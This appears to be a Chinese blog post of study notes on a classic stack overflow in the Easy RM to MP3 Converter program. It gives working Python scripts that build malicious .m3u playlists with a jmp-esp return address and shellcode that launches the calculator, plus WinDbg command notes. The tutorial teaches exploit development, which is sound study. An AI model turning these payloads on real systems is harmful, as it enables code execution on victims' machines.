Exploit Easy RM 2 MP3的学习笔记

于 2019-05-29 23:27:53 发布
阅读量195 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42127015/article/details/90680633
版权

  这篇文章,是我的学习笔记。很多人在学习二进制的漏洞挖掘的时候,都会觉得入门很难,甚至是看不下去,其实我到不是这样认为的,无论学习什么都是要抓住重点和原理,知识在于分享,有很多人觉得如果我会了,就不应该告诉别人,我不是这么认为,我在外国也经常会分享一些东西,大家都很感兴趣,有的时候就会把我拉入私人小组,我也认识很多喜欢分享的朋友比如红尘,大柱子等等。还有就是你要做这件事的目标是什么,你的目标如何实现。

栈溢出重点在于:1,抓住缓存空间的入口地址;2,并且写入的字节数撑爆了这个变量所申请的缓冲区的边界,导致溢出。

  1,下载有漏洞的软件  

https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe

2,利用POC生成一个evil1.m3u

#!/usr/bin/python
import sys

header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46" 
header += "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"
header += "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"
header += "\x0D\x0A\x44\x3A\x5C"

junk = "\x41" * 30000
ret = "\xDB\x70\xBB\x01"
nop = "\x90" * 220

calc_shell = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
calc_shell += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
calc_shell += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
calc_shell += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
calc_shell += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
calc_shell += "\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47"
calc_shell += "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
calc_shell += "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48"
calc_shell += "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
calc_shell += "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
calc_shell += "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38"
calc_shell += "\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54"
calc_shell += "\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
calc_shell += "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
calc_shell += "\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57"
calc_shell += "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a"
calc_shell += "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
calc_shell += "\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33"
calc_shell += "\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
calc_shell += "\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39"
calc_shell += "\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36"
calc_shell += "\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a"

if len(sys.argv) < 2:
    print 'usage: python ' + sys.argv[0] +' name.m3u'
else:
    with open(sys.argv[1],"w") as f:
        f.write(header + junk + ret + nop + calc_shell)

文件的内容为:

 

junk = "\x41" * 1293 填充了1293个A发现程序并没有崩溃,那需要填写更大的数据来测试一下,我们可以增加到3W,再次生成evil3.m3u,发现程序已经崩溃,因为被覆盖后的地址不可控或者没有映射到内存空间,所以导致程序崩溃

 

崩溃后发现调用的地址是0x41414141,发现此地址并未映射内存空间,所以导致程序崩溃。

 

下面普及一下基本的流程控制与DEBUG事件

t-单步进入

gu-go up,执行当前函数直到结束,返回调用者

p-单步跳过

g-go 程序继续执行

Ctrl+Break--被调试程序运行时,可以通过这个热键暂停

[t|p]a Address --单步进入/单步跳过执行到指定地址

gc-这个指令用于在条件断点的时候挂起执行后执行恢复

  g[h|n]--发生异常的时间,这个命令用于已经处理恢复执行和未处理执行

  [p|t]c--单步跳过,直到遇见CALL

  [p|t]h--单步跳过,直到遇到分支跳转指令

[p|t]t--单步跳过,知道遇到RET指令

[p|t]tc--单步跳过,直到遇见CALL或者RET

~命令列出所有线程

~1s切换到的线程号

|1s 切换进程的号

r eax=2 修改寄存器的值

rm 显示当前寄存器掩码

lm n 查看进程与模块

lm v m *volsnap* 可以通过V开关打开VERBOSE模式,通过m参数指定一个要匹配的模块名

!process 0 0 列出所有运行的进程

!process 0 0 explorer.exe 可以知道EROCESS的值

还有很多就不一一列出了。

现在要寻找ret 的地址,利用MONA插件生成有规律的字符,可以通过规律可循找偏移量

 

把这段16进制的数据贴到JUNK里,重新加载生成的m3u文件,程序崩溃,地址在48336d48

!py mona.py pattern_offset 48336d48 通过查找这个地址计算偏移量为20280+5829
 

 

填充RET地址,看一下结果:

junk = "\x41"*26105

是因为EBP栈占了四位

ebp = "\x42\x42\x42\x42"

ret地址附上"\x43\x43\x43\x43"

#!/usr/bin/python
import sys

header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46" 
header += "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"
header += "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"
header += "\x0D\x0A\x44\x3A\x5C"

junk = "\x41"*26105
ebp = "\x42\x42\x42\x42"
ret = "\x43\x43\x43\x43"
shellcode = "\x90" * 220 + "\xcc"

payload = header + junk + ebp + ret + shellcode

if len(sys.argv) < 2:
    print 'usage: python ' + sys.argv[0] +' name.m3u'
else:
    with open(sys.argv[1],"w") as f:
        f.write(payload)

读取寄存器,已经被覆盖90可以发现此时esp指向0015f614,而该位置ret+8,然后我们随便找kernel32.dll中随便找到一个”jmp esp”指令,把地址77894f77填充到ret字段中:

shellcode先暂时设置成”\xcc”,也就是’int 3’指令。

#!/usr/bin/python
import sys

header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46" 
header += "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"
header += "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"
header += "\x0D\x0A\x44\x3A\x5C"

junk = "\x41"*26105
ebp = "\x42\x42\x42\x42"
ret = "\x77\x4f\x89\x77"
shellcode = "\x90" * 4 + "\xcc"

payload = header + junk + ebp + ret + shellcode

if len(sys.argv) < 2:
    print 'usage: python ' + sys.argv[0] +' name.m3u'
else:
    with open(sys.argv[1],"w") as f:
        f.write(payload)

跳到了shellcode起始字节处开始执行:

 

最终exp,弹出计算器:

#!/usr/bin/python
import sys

header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46" 
header += "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"
header += "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"
header += "\x0D\x0A\x44\x3A\x5C"

junk = "\x41"*26105
ebp = "\x42\x42\x42\x42"
ret = "\x77\x4f\x89\x77"


buf = "\xbf\x86\x79\x7d\x55\xdd\xc7\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
buf += "\x30\x31\x78\x13\x03\x78\x13\x83\xe8\x7a\x9b\x88\xa9\x6a\xde"
buf += "\x73\x52\x6a\xbf\xfa\xb7\x5b\xff\x99\xbc\xcb\xcf\xea\x91\xe7"
buf += "\xa4\xbf\x01\x7c\xc8\x17\x25\x35\x67\x4e\x08\xc6\xd4\xb2\x0b"
buf += "\x44\x27\xe7\xeb\x75\xe8\xfa\xea\xb2\x15\xf6\xbf\x6b\x51\xa5"
buf += "\x2f\x18\x2f\x76\xdb\x52\xa1\xfe\x38\x22\xc0\x2f\xef\x39\x9b"
buf += "\xef\x11\xee\x97\xb9\x09\xf3\x92\x70\xa1\xc7\x69\x83\x63\x16"
buf += "\x91\x28\x4a\x97\x60\x30\x8a\x1f\x9b\x47\xe2\x5c\x26\x50\x31"
buf += "\x1f\xfc\xd5\xa2\x87\x77\x4d\x0f\x36\x5b\x08\xc4\x34\x10\x5e"
buf += "\x82\x58\xa7\xb3\xb8\x64\x2c\x32\x6f\xed\x76\x11\xab\xb6\x2d"
buf += "\x38\xea\x12\x83\x45\xec\xfd\x7c\xe0\x66\x13\x68\x99\x24\x79"
buf += "\x6f\x2f\x53\xcf\x6f\x2f\x5c\x7f\x18\x1e\xd7\x10\x5f\x9f\x32"
buf += "\x55\xaf\xd5\x1f\xff\x38\xb0\xf5\x42\x25\x43\x20\x80\x50\xc0"
buf += "\xc1\x78\xa7\xd8\xa3\x7d\xe3\x5e\x5f\x0f\x7c\x0b\x5f\xbc\x7d"
buf += "\x1e\x3c\x23\xee\xc2\xc3";


shellcode = "\x90" * 30 + buf

payload = header + junk + ebp + ret + shellcode

if len(sys.argv) < 2:
    print 'usage: python ' + sys.argv[0] +' name.m3u'
else:
    with open(sys.argv[1],"w") as f:
        f.write(payload)
 

weixin_42127015
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Easy RM to MP3 Converter漏洞分析报告
李祥的博客
02-28 1121
Easy RM to MP3 Converter漏洞分析报告 软件名称:Easy RM to MP3 Converter 软件版本:2.7.3.700 漏洞模块:RM2MP3Converter.exe 模块版本:2.7.3.700 编译日期:2006-09-29 操作系统:Windows 7 SP1(6.1.7601) 漏洞编号: 危害等级:中 漏洞类型:缓冲区溢出 威胁类型:本
Easy RM to MP3 漏洞调试
xiaoeryu_的博客
03-18 304
0X00 前言 分析这个漏洞主要是为了学习怎么通过调试并编写溢出类型漏洞的EXP 0X01 分析环境 调试环境 版本 系统版本 XP_sp3 Easy RM to MP3 2.7.3.700 windbg 6.12 0X02 漏洞描述 这个漏洞是一个典型的溢出类型漏洞,在处理字符的时候没有对长度做限制,在读取到第25000~30000个字符的时候会导致返回地址被覆盖导致溢出 0X03 漏洞分析 编写perl脚本生成漏洞验证文件 my $file= "crash25000.m3u"
Easy RM to MP3 Converter 2.7.3.700
03-12
Easy RM to MP3 Converter 2.7.3.700
Easy RM to MP3 Converter Version 2.7.3 700漏洞分析
w4y2'blog
04-03 1908
软件链接:http://pan.baidu.com/s/1eQcLbpw 测试环境:xp sp3 看了exploit编写教程第一篇,知道了这个小软件有溢出漏洞,教程上用的是windbg分析的,由于咱习惯了界面友好的OD,对于教程上的分析步骤不是很感冒,既然知道了这是个有溢出漏洞的软件,那不如自己用OD亲自实践一把。   运行程序,界面如图,下方为它的版本号。    
Easy RM to MP3 Converter
08-24
对于"Easy RM to MP3 Converter 2.73700.exe"这个文件,如果存在栈溢出漏洞,应及时更新到最新版本,以消除潜在的安全风险。 总之,栈溢出是网络安全中的一个重要课题,理解和防范栈溢出是确保软件安全的关键。无论...
渗透测试学习笔记之案例三.pdf
04-06
### 渗透测试学习笔记之案例三 #### 案例背景 在本文档中,我们将探讨一个具体的渗透测试案例,旨在通过实际操作加深对渗透测试的理解与掌握。本案例聚焦于对一个特定网络环境中的目标靶机进行渗透测试的过程与...
K8 Struts2 Exploit 最新无后门版
03-08
K8 Struts2 Exploit 最新无后门版
ret2libc exploit
07-07
### Return-to-libc (ret2libc) Exploit详解 #### 引言 在深入探讨Return-to-libc(简称ret2libc)技术之前,我们先简要回顾一下这一领域的背景知识。随着网络安全领域的不断发展,攻击者与防御者的对抗也在不断...
x_php_for_php_4_1_2_c.rar_4 3 2 1_Exploit
09-23
文件“x_php_for_php_4_1_2_c.rar_4 3 2 1_Exploit”揭示了这一安全隐患,其包含的“x_php_for_php_4_1_2_c.htm”和“www.pudn.com.txt”两个文件,分别提供了exploit的实现代码和可能的来源信息。 首先,让我们...
Easy methods to select MB Star, Extremely MB Star, MB SD C4, Mercedes BENZ C5 SD
weixin_30462049的博客
04-10 88
MB Star, Extremely MB SD Connect C4, MB SD C4, Mercedes BENZ C5 SD are usually analysis tools to get benz, and autonumen.com have several different benz diagnostic tools,how to choose from them? you....
经典栈溢出 Easy RM to MP3 Converter
钞sir的博客
10-24 4291
以一个样本(Easy RM to MP3 Converter)将作为经典栈溢出的讲解实例,首先说明此实验是WIN10环境下复现的; “Easy RM 2 MP3 Converter”是一个音频格式的转换工具,年代比较久远了。在2009年7月17日,packetstormsecurity公开了该软件的一个栈溢出漏洞并提供了exploit:https://packetstormsecurity.co...
Easy RM to MP3 Converter(2.7.3.700)栈溢出漏洞调试笔记
weixin_33778544的博客
03-08 426
Debug_Orz · 2014/10/13 17:410x00 基础知识1 Windows环境选取wmplayer.exe程序运行时的内存布局示意,包括栈,堆,加载模块(DLLs)和可执行文件本身。Win32进程空间布局示意。1.2 入口点(Entrypoint)运行一个EXE的时候,会先根据IAT表加载相应的DLL,并且用GetProcAddress得到API的真实地址。也就是说EXE运行后,...
Shellcode
tony的专栏
03-31 1080
// windows 下弹计算器的shellcode,貌似不支持windows7及以上版本 // 先记下 shellcode = "" shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" shellcode+="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\x
基于Springboot和Vue的图书借还管理系统源码 图书借还管理系统代码(高分毕设)
最新发布
07-28
图书借还管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
C语言内存管理:静态与动态分配的较量
07-28
C语言是一种通用的编程语言,由丹尼斯·里奇(Dennis Ritchie)在20世纪70年代早期于美国电话电报公司(AT&T)的贝尔实验室开发。C语言以其高效性、灵活性和可移植性而闻名,它是一种过程式编程语言,提供了对底层硬件的直接访问能力。 C语言的特点包括: 1. **简洁高效**:C语言的语法简洁,执行效率高,适合编写系统软件。 2. **接近硬件**:C语言提供了对内存地址和位操作的直接控制,使其非常适合硬件级编程。 3. **可移植性**:C语言编写的程序可以在不同的操作系统和硬件平台上编译和运行,具有很好的可移植性。 4. **丰富的库支持**:C语言拥有大量的标准库,如标准输入输出库(stdio.h)、数学库(math.h)等。 5. **结构化编程**:C语言支持结构化编程,允许使用循环、条件判断和函数等控制结构。 6. **指针**:C语言的指针功能强大,可以操作内存地址,实现复杂的数据结构和算法。 7. **编译型语言**:C语言是一种编译型语言,源代码需要通过编译器转换成机器码才能运行。 C语言广泛应用于操作系统(如Unix和Linux)、嵌入式系统、高性能
linux-exploit-suggester2
07-28
针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值